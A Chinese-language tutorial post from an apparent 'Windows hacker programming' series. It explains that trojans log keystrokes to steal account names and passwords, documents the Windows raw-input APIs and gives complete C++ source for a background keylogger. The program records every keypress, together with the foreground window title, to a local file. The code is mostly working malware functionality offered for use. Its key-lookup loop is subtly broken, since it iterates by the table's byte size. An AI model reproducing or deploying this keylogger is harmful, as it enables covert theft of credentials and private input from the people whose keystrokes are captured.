windows黑客编程系列(十一):按键记录

文章目录

    • 功能技术模块
      • 按键记录
      • WINAPI
        • RegisterRawInputDevices
        • tagRAWINPUTDEVICE结构体
        • GetRawInputData
      • 编码实现

功能技术模块

病毒木马的入侵并潜伏在用户计算机上总是有着某种目的,例如获取用户隐私的办公文件或是账号密码,或是控制肉鸡,或是进行加密磁盘文件然后进行勒索。

按键记录

顾名思义,即程序在后台记录下用户在计算机上使用的所有按键信息,信息包括哪个时刻在哪个窗口按下哪个按键。

可见,这个功能对于病毒木马来说意义非凡,病毒木马控制者可以根据按键记录分辨出哪些类似于账号,密码等关键数据,从而进行利用,盗取信息。

实现该功能一般有以下三种方式:

  • 利用全局键盘钩子,程序设置全局键盘钩子,从而捕获按键信息,进行记录。
  • 利用GetAsyncKeyState函数,该函数可以判断按键状态,根据是否为按下状态来判断用户是否进行了按键操作。
  • 利用原始输入模型,直接从输入设备上获取数据,从而记录按键信息。

下面我们使用第三种方法进行操作,该方法更加底层,也更为有效。

WINAPI


RegisterRawInputDevices

注册提供原始输入的设备

函数声明:

BOOL WINAPI RegisterRawInputDevices(
    _In_reads_(uiNumDevices) PCRAWINPUTDEVICE pRawInputDevices,
    _In_ UINT uiNumDevices,
    _In_ UINT cbSize);

参数说明:

  • pRawInputDevices:指向一组PCRAWINPUTDEVICE结构体,代表提供原始输入的设备。
  • uiNumDevices:PCRAWINPUTDEVICE结构的数量。
  • cbSize:指向PCRAWINPUTDEVICE结构的大小(以字节为单位)

返回值:

  • 成功执行返回TRUE;
  • 否则返回值为FALSE;

tagRAWINPUTDEVICE结构体

结构体定义:

typedef struct tagRAWINPUTDEVICE {
    USHORT usUsagePage; // Toplevel collection UsagePage
    USHORT usUsage;     // Toplevel collection Usage
    DWORD dwFlags;
    HWND hwndTarget;    // Target hwnd. NULL = follows keyboard focus
} RAWINPUTDEVICE, *PRAWINPUTDEVICE, *LPRAWINPUTDEVICE;

成员说明:

  • usUsagePage:指向原始输入设备的顶级集合使用的页面。
  • usUsage:指向原始输入设备的顶级集合的用法。
  • dwFlags:模式标志,指定如何解释由usUsagePage和usUsage提供的信息。默认值为0,默认情况下,只要具有窗口焦点,操作系统就会将具有顶级集合设备的原始输入发送到已注册的应用程序中。
  • hwndTarget:指向目标窗口的句柄,如果是NULL,则会遵循键盘焦点。

GetRawInputData

函数声明:

UINT WINAPI GetRawInputData(
    _In_ HRAWINPUT hRawInput,
    _In_ UINT uiCommand,
    _Out_writes_bytes_to_opt_(*pcbSize, return) LPVOID pData,
    _Inout_ PUINT pcbSize,
    _In_ UINT cbSizeHeader);

参数说明:

  • hRawInput:指向RAWINPUT结构体的句柄,来自WM_INPUT中的IParam
  • uiCommand:命令标志,可以是以下值之一:
    • RID_HEADER:从RAWINPUT结构获取头信息
    • RID_INPUT:从RAWINPUT获取原始数据
  • pData:指向来自RAWINPUT结构的数据指针,这取决于uiCommand的值,如果pData为NULL,则在pcbSize返回所需的缓冲区大小
  • pcbSize:指定pData数据的大小
  • cbSizeHeader:指定RAWINPUTHEADER结构的大小

返回值:

  • 如果pData为NULL,且函数执行成功,则返回值为0
  • 如果pData不为NULL且函数执行成功,则返回值为复制到pData中的字节数
  • 如果有错误,则返回值为-1

编码实现

// WindowsProject1.cpp : 定义应用程序的入口点。
//

#include "framework.h"
#include "WindowsProject1.h"
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#define AddVKey(VK, VKName) { (VK), (VKName) }


BOOL Init_device(HWND hWnd)
{
	RAWINPUTDEVICE rawinputDevice = { 0 };
	rawinputDevice.usUsagePage = 0x01;
	rawinputDevice.usUsage = 0x06;
	rawinputDevice.dwFlags = RIDEV_INPUTSINK;
	rawinputDevice.hwndTarget = hWnd;
	BOOL bRet = RegisterRawInputDevices(&rawinputDevice, 1, sizeof(rawinputDevice));
	if (bRet == FALSE)
	{
		//printf("Register error!\n");
		return FALSE;
	}
	return TRUE;
}

struct VKeyInfo {
	USHORT VKey;
	LPCWSTR VKname;
};

static VKeyInfo vkis[] = {
		AddVKey(VK_LBUTTON, L"Left mouse button"),
		AddVKey(VK_RBUTTON, L"Right mouse button"),
		AddVKey(VK_CANCEL, L"Control-break processing"),
		AddVKey(0x04, L"Middle mouse button (three-button mouse)"),
		AddVKey(0x05, L"Windows 2000/XP: X1 mouse button"),
		AddVKey(0x06, L"Windows 2000/XP: X2 mouse button"),
		AddVKey(0x07, L"Undefined"),
		AddVKey(VK_BACK, L"BACKSPACE key"),
		AddVKey(VK_TAB, L"TAB key"),
		AddVKey(0x0A, L"Reserved"),
		AddVKey(0x0B, L"Reserved"),
		AddVKey(VK_CLEAR, L"CLEAR key"),
		AddVKey(VK_RETURN, L"ENTER key"),
		AddVKey(0x0E, L"Undefined"),
		AddVKey(0x0F, L"Undefined"),
		AddVKey(VK_SHIFT, L"SHIFT key"),
		AddVKey(VK_CONTROL, L"CTRL key"),
		AddVKey(VK_MENU, L"ALT key"),
		AddVKey(VK_PAUSE, L"PAUSE key"),
		AddVKey(VK_CAPITAL, L"CAPS LOCK key"),
		AddVKey(VK_KANA, L"Input Method Editor (IME) Kana mode"),
		AddVKey(VK_HANGUL, L"IME Hangul mode"),
		AddVKey(0x16, L"Undefined"),
		AddVKey(VK_JUNJA, L"IME Junja mode"),
		AddVKey(VK_FINAL, L"IME final mode"),
		AddVKey(VK_HANJA, L"IME Hanja mode"),
		AddVKey(VK_KANJI, L"IME Kanji mode"),
		AddVKey(0x1A, L"Undefined"),
		AddVKey(VK_ESCAPE, L"ESC key"),
		AddVKey(VK_CONVERT, L"IME convert"),
		AddVKey(VK_NONCONVERT, L"IME nonconvert"),
		AddVKey(VK_ACCEPT, L"IME accept"),
		AddVKey(VK_MODECHANGE, L"IME mode change request"),
		AddVKey(VK_SPACE, L"SPACEBAR"),
		AddVKey(VK_PRIOR, L"PAGE UP key"),
		AddVKey(VK_NEXT, L"PAGE DOWN key"),
		AddVKey(VK_END, L"END key"),
		AddVKey(VK_HOME, L"HOME key"),
		AddVKey(VK_LEFT, L"LEFT ARROW key"),
		AddVKey(VK_UP, L"UP ARROW key"),
		AddVKey(VK_RIGHT, L"RIGHT ARROW key"),
		AddVKey(VK_DOWN, L"DOWN ARROW key"),
		AddVKey(VK_SELECT, L"SELECT key"),
		AddVKey(VK_PRINT, L"PRINT key"),
		AddVKey(VK_EXECUTE, L"EXECUTE key"),
		AddVKey(VK_SNAPSHOT, L"PRINT SCREEN key"),
		AddVKey(VK_INSERT, L"INSERT key"),
		AddVKey(VK_DELETE, L"DEL key"),
		AddVKey(VK_HELP, L"HELP key"),
		AddVKey(0x30, L"0"),
		AddVKey(0x31, L"1"),
		AddVKey(0x32, L"2"),
		AddVKey(0x33, L"3"),
		AddVKey(0x34, L"4"),
		AddVKey(0x35, L"5"),
		AddVKey(0x36, L"6"),
		AddVKey(0x37, L"7"),
		AddVKey(0x38, L"8"),
		AddVKey(0x39, L"9"),
		AddVKey(0x3A, L"Undefined"),
		AddVKey(0x3B, L"Undefined"),
		AddVKey(0x3C, L"Undefined"),
		AddVKey(0x3D, L"Undefined"),
		AddVKey(0x3E, L"Undefined"),
		AddVKey(0x3F, L"Undefined"),
		AddVKey(0x40, L"Undefined"),
		AddVKey(0x41, L"A"),
		AddVKey(0x42, L"B"),
		AddVKey(0x43, L"C"),
		AddVKey(0x44, L"D"),
		AddVKey(0x45, L"E"),
		AddVKey(0x46, L"F"),
		AddVKey(0x47, L"G"),
		AddVKey(0x48, L"H"),
		AddVKey(0x49, L"I"),
		AddVKey(0x4A, L"J"),
		AddVKey(0x4B, L"K"),
		AddVKey(0x4C, L"L"),
		AddVKey(0x4D, L"M"),
		AddVKey(0x4E, L"N"),
		AddVKey(0x4F, L"O"),
		AddVKey(0x50, L"P"),
		AddVKey(0x51, L"Q"),
		AddVKey(0x52, L"R"),
		AddVKey(0x53, L"S"),
		AddVKey(0x54, L"T"),
		AddVKey(0x55, L"U"),
		AddVKey(0x56, L"V"),
		AddVKey(0x57, L"W"),
		AddVKey(0x58, L"X"),
		AddVKey(0x59, L"Y"),
		AddVKey(0x5A, L"Z"),

		AddVKey(VK_LWIN, L"Left Windows key (Microsoft Natural keyboard)"),
		AddVKey(VK_RWIN, L"Right Windows key (Natural keyboard)"),
		AddVKey(VK_APPS, L"Applications key (Natural keyboard)"),
		AddVKey(0x5E, L"Reserved"),
		AddVKey(VK_SLEEP, L"Computer Sleep key"),
		AddVKey(VK_NUMPAD0, L"Numeric keypad 0 key"),
		AddVKey(VK_NUMPAD1, L"Numeric keypad 1 key"),
		AddVKey(VK_NUMPAD2, L"Numeric keypad 2 key"),
		AddVKey(VK_NUMPAD3, L"Numeric keypad 3 key"),
		AddVKey(VK_NUMPAD4, L"Numeric keypad 4 key"),
		AddVKey(VK_NUMPAD5, L"Numeric keypad 5 key"),
		AddVKey(VK_NUMPAD6, L"Numeric keypad 6 key"),
		AddVKey(VK_NUMPAD7, L"Numeric keypad 7 key"),
		AddVKey(VK_NUMPAD8, L"Numeric keypad 8 key"),
		AddVKey(VK_NUMPAD9, L"Numeric keypad 9 key"),
		AddVKey(VK_MULTIPLY, L"Multiply key"),
		AddVKey(VK_ADD, L"Add key"),
		AddVKey(VK_SEPARATOR, L"Separator key"),
		AddVKey(VK_SUBTRACT, L"Subtract key"),
		AddVKey(VK_DECIMAL, L"Decimal key"),
		AddVKey(VK_DIVIDE, L"Divide key"),
		AddVKey(VK_F1, L"F1 key"),
		AddVKey(VK_F2, L"F2 key"),
		AddVKey(VK_F3, L"F3 key"),
		AddVKey(VK_F4, L"F4 key"),
		AddVKey(VK_F5, L"F5 key"),
		AddVKey(VK_F6, L"F6 key"),
		AddVKey(VK_F7, L"F7 key"),
		AddVKey(VK_F8, L"F8 key"),
		AddVKey(VK_F9, L"F9 key"),
		AddVKey(VK_F10, L"F10 key"),
		AddVKey(VK_F11, L"F11 key"),
		AddVKey(VK_F12, L"F12 key"),
		AddVKey(VK_F13, L"F13 key"),
		AddVKey(VK_F14, L"F14 key"),
		AddVKey(VK_F15, L"F15 key"),
		AddVKey(VK_F16, L"F16 key"),
		AddVKey(VK_F17, L"F17 key"),
		AddVKey(VK_F18, L"F18 key"),
		AddVKey(VK_F19, L"F19 key"),
		AddVKey(VK_F20, L"F20 key"),
		AddVKey(VK_F21, L"F21 key"),
		AddVKey(VK_F22, L"F22 key"),
		AddVKey(VK_F23, L"F23 key"),
		AddVKey(VK_F24, L"F24 key"),
		AddVKey(0x88, L"Unassigned"),
		AddVKey(0x89, L"Unassigned"),
		AddVKey(0x8A, L"Unassigned"),
		AddVKey(0x8B, L"Unassigned"),
		AddVKey(0x8C, L"Unassigned"),
		AddVKey(0x8D, L"Unassigned"),
		AddVKey(0x8E, L"Unassigned"),
		AddVKey(0x8F, L"Unassigned"),
		AddVKey(VK_NUMLOCK, L"NUM LOCK key"),
		AddVKey(VK_SCROLL, L"SCROLL LOCK key"),
		AddVKey(0x92, L"OEM specific"),
		AddVKey(0x93, L"OEM specific"),
		AddVKey(0x94, L"OEM specific"),
		AddVKey(0x95, L"OEM specific"),
		AddVKey(0x96, L"OEM specific"),
		AddVKey(0x97, L"Unassigned"),
		AddVKey(0x98, L"Unassigned"),
		AddVKey(0x99, L"Unassigned"),
		AddVKey(0x9A, L"Unassigned"),
		AddVKey(0x9B, L"Unassigned"),
		AddVKey(0x9C, L"Unassigned"),
		AddVKey(0x9D, L"Unassigned"),
		AddVKey(0x9E, L"Unassigned"),
		AddVKey(0x9F, L"Unassigned"),
		AddVKey(VK_LSHIFT, L"Left SHIFT key"),
		AddVKey(VK_RSHIFT, L"Right SHIFT key"),
		AddVKey(VK_LCONTROL, L"Left CONTROL key"),
		AddVKey(VK_RCONTROL, L"Right CONTROL key"),
		AddVKey(VK_LMENU, L"Left MENU key"),
		AddVKey(VK_RMENU, L"Right MENU key"),
		AddVKey(0xA6, L"Windows 2000/XP: Browser Back key"),
		AddVKey(0xA7, L"Windows 2000/XP: Browser Forward key"),
		AddVKey(0xA8, L"Windows 2000/XP: Browser Refresh key"),
		AddVKey(0xA9, L"Windows 2000/XP: Browser Stop key"),
		AddVKey(0xAA, L"Windows 2000/XP: Browser Search key"),
		AddVKey(0xAB, L"Windows 2000/XP: Browser Favorites key"),
		AddVKey(0xAC, L"Windows 2000/XP: Browser Start and Home key"),
		AddVKey(0xAD, L"Windows 2000/XP: Volume Mute key"),
		AddVKey(0xAE, L"Windows 2000/XP: Volume Down key"),
		AddVKey(0xAF, L"Windows 2000/XP: Volume Up key"),
		AddVKey(0xB0, L"Windows 2000/XP: Next Track key"),
		AddVKey(0xB1, L"Windows 2000/XP: Previous Track key"),
		AddVKey(0xB2, L"Windows 2000/XP: Stop Media key"),
		AddVKey(0xB3, L"Windows 2000/XP: Play/Pause Media key"),
		AddVKey(0xB4, L"Windows 2000/XP: Start Mail key"),
		AddVKey(0xB5, L"Windows 2000/XP: Select Media key"),
		AddVKey(0xB6, L"Windows 2000/XP: Start Application 1 key"),
		AddVKey(0xB7, L"Windows 2000/XP: Start Application 2 key"),
		AddVKey(0xB8, L"Reserved"),
		AddVKey(0xB9, L"Reserved"),
		AddVKey(VK_OEM_1, L"Used for miscellaneous characters; it can vary by keyboard."
						  L"Windows 2000/XP: For the US standard keyboard, the \';:\' key"),
		AddVKey(VK_OEM_PLUS, L"Windows 2000/XP: For any country/region, the \'+\' key"),
		AddVKey(VK_OEM_COMMA, L"Windows 2000/XP: For any country/region, the \',\' key"),
		AddVKey(VK_OEM_MINUS, L"Windows 2000/XP: For any country/region, the \'-\' key"),
		AddVKey(VK_OEM_PERIOD, L"Windows 2000/XP: For any country/region, the \'.\' key"),
		AddVKey(VK_OEM_2, L"Used for miscellaneous characters; it can vary by keyboard.L"
						  L"Windows 2000/XP: For the US standard keyboard, the \'/?\' key"),
		AddVKey(VK_OEM_3, L"Used for miscellaneous characters; it can vary by keyboard.L"
						  L"Windows 2000/XP: For the US standard keyboard, the \'`~\' key"),
		AddVKey(0xC1, L"Reserved"),
		AddVKey(0xC2, L"Reserved"),
		AddVKey(0xC3, L"Reserved"),
		AddVKey(0xC4, L"Reserved"),
		AddVKey(0xC5, L"Reserved"),
		AddVKey(0xC6, L"Reserved"),
		AddVKey(0xC7, L"Reserved"),
		AddVKey(0xC8, L"Reserved"),
		AddVKey(0xC9, L"Reserved"),
		AddVKey(0xCA, L"Reserved"),
		AddVKey(0xCB, L"Reserved"),
		AddVKey(0xCC, L"Reserved"),
		AddVKey(0xCD, L"Reserved"),
		AddVKey(0xCE, L"Reserved"),
		AddVKey(0xCF, L"Reserved"),
		AddVKey(0xD0, L"Reserved"),
		AddVKey(0xD1, L"Reserved"),
		AddVKey(0xD2, L"Reserved"),
		AddVKey(0xD3, L"Reserved"),
		AddVKey(0xD4, L"Reserved"),
		AddVKey(0xD5, L"Reserved"),
		AddVKey(0xD6, L"Reserved"),
		AddVKey(0xD7, L"Reserved"),
		AddVKey(0xD8, L"Unassigned"),
		AddVKey(0xD9, L"Unassigned"),
		AddVKey(0xDA, L"Unassigned"),
		AddVKey(VK_OEM_4, L"Used for miscellaneous characters; it can vary by keyboard."
						  L"Windows 2000/XP: For the US standard keyboard, the \'[{\' key"),
		AddVKey(VK_OEM_5, L"Used for miscellaneous characters; it can vary by keyboard.L"
						  L"Windows 2000/XP: For the US standard keyboard, the \'\\|\' key"),
		AddVKey(VK_OEM_6, L"Used for miscellaneous characters; it can vary by keyboard.L"
						  L"Windows 2000/XP: For the US standard keyboard, the \']}\' key"),
		AddVKey(VK_OEM_7, L"Used for miscellaneous characters; it can vary by keyboard.L"
						  L"Windows 2000/XP: For the US standard keyboard, the \'single-quote/double-quote\' key"),

		AddVKey(VK_OEM_8, L"Used for miscellaneous characters; it can vary by keyboard."),
		AddVKey(0xE0, L"Reserved"),
		AddVKey(0xE1, L"OEM specific"),
		AddVKey(VK_OEM_102, L"Windows 2000/XP: Either the angle bracket key or the backslash key on the RT 102-key keyboard"),
		AddVKey(0xE3, L"OEM specific"),
		AddVKey(0xE4, L"OEM specific"),
		AddVKey(VK_PROCESSKEY, L"Windows 95/98/Me, Windows NT 4.0, Windows 2000/XP: IME PROCESS key"),
		AddVKey(0xE6, L"OEM specific"),
		AddVKey(0xE7, L"Windows 2000/XP: Used to pass Unicode characters as if they were keystrokes. The VK_PACKET key is the low word of a 32-bit Virtual Key value used for non-keyboard input methods. For more information, see Remark in KEYBDINPUT, SendInput, WM_KEYDOWN, and WM_KEYUP"),
		AddVKey(0xE8, L"Unassigned"),
		AddVKey(0xE9, L"OEM specific"),
		AddVKey(0xEA, L"OEM specific"),
		AddVKey(0xEB, L"OEM specific"),
		AddVKey(0xEC, L"OEM specific"),
		AddVKey(0xED, L"OEM specific"),
		AddVKey(0xEF, L"OEM specific"),
		AddVKey(0xF0, L"OEM specific"),
		AddVKey(0xF1, L"OEM specific"),
		AddVKey(0xF2, L"OEM specific"),
		AddVKey(0xF3, L"OEM specific"),
		AddVKey(0xF4, L"OEM specific"),
		AddVKey(0xF5, L"OEM specific"),
		AddVKey(VK_ATTN, L"Attn key"),
		AddVKey(VK_CRSEL, L"CrSel key"),
		AddVKey(VK_EXSEL, L"ExSel key"),
		AddVKey(VK_EREOF, L"Erase EOF key"),
		AddVKey(VK_PLAY, L"Play key"),
		AddVKey(VK_ZOOM, L"Zoom key"),
		AddVKey(VK_NONAME, L"Reserved"),
		AddVKey(VK_PA1, L"PA1 key"),
		AddVKey(VK_OEM_CLEAR, L"Clear key"),
		AddVKey(0xFF, L"Unknown Virtual-Key Code")
};


LPCWSTR GetKeyName(USHORT VKey)
{
	int i;
	for (i = 0; i < sizeof(vkis); i++)
	{
		if (VKey == vkis[i].VKey)
			return vkis[i].VKname;
	}
	return vkis[--i].VKname;
}

void Save_key(USHORT usVKey)
{
	wchar_t szTitle[MAX_PATH] = { 0 };
	wchar_t szKey[MAX_PATH] = { 0 };
	wchar_t szText[MAX_PATH] = { 0 };
	FILE* fp = NULL;
	HWND hForegroudWnd = GetForegroundWindow();
	GetWindowText(hForegroudWnd, szTitle, 256);
	lstrcpy(szKey, GetKeyName(usVKey));
	wsprintf(szText, L"[%s] %s\r\n", szTitle, szKey);
	fopen_s(&fp, "keylog.txt", "a+");
	if (fp == NULL)
	{
		//printf("open file error!\n");
		return;
	}
	fwrite(szText, (1 + lstrlenW(szText)), 1, fp);
	fclose(fp);
}

BOOL GetData(LPARAM lParam)
{
	RAWINPUT rawinputdata = { 0 };
	UINT uiSize = sizeof(rawinputdata);
	GetRawInputData((HRAWINPUT)lParam, RID_INPUT, &rawinputdata, &uiSize, sizeof(RAWINPUTHEADER));
	if (rawinputdata.header.dwType == RIM_TYPEKEYBOARD)
	{
		if (rawinputdata.data.keyboard.Message == WM_KEYDOWN || rawinputdata.data.keyboard.Message == WM_SYSKEYDOWN)
		{
			Save_key(rawinputdata.data.keyboard.VKey);
		}
	}
	return TRUE;
}

BOOL CALLBACK ProgMainDlg(HWND hWnd, UINT uiMsg, WPARAM wParam, LPARAM lParam)
{
	if (WM_INITDIALOG == uiMsg)
	{
		Init_device(hWnd);
	}
	else if (WM_CLOSE == uiMsg)
	{
		EndDialog(hWnd, NULL);
	}
	else if (WM_INPUT == uiMsg)
	{
		GetData(lParam);
	}

	return FALSE;
}


int WINAPI WinMain(
	HINSTANCE hInstance,
	HINSTANCE hPrevinstance,
	LPSTR lpCmdLine,
	int nCmdShow)
{
	DialogBoxParam(hInstance, (LPCWSTR)101, NULL, (DLGPROC)ProgMainDlg, NULL);
	ExitProcess(NULL);
}

你可能感兴趣的:(windows编程)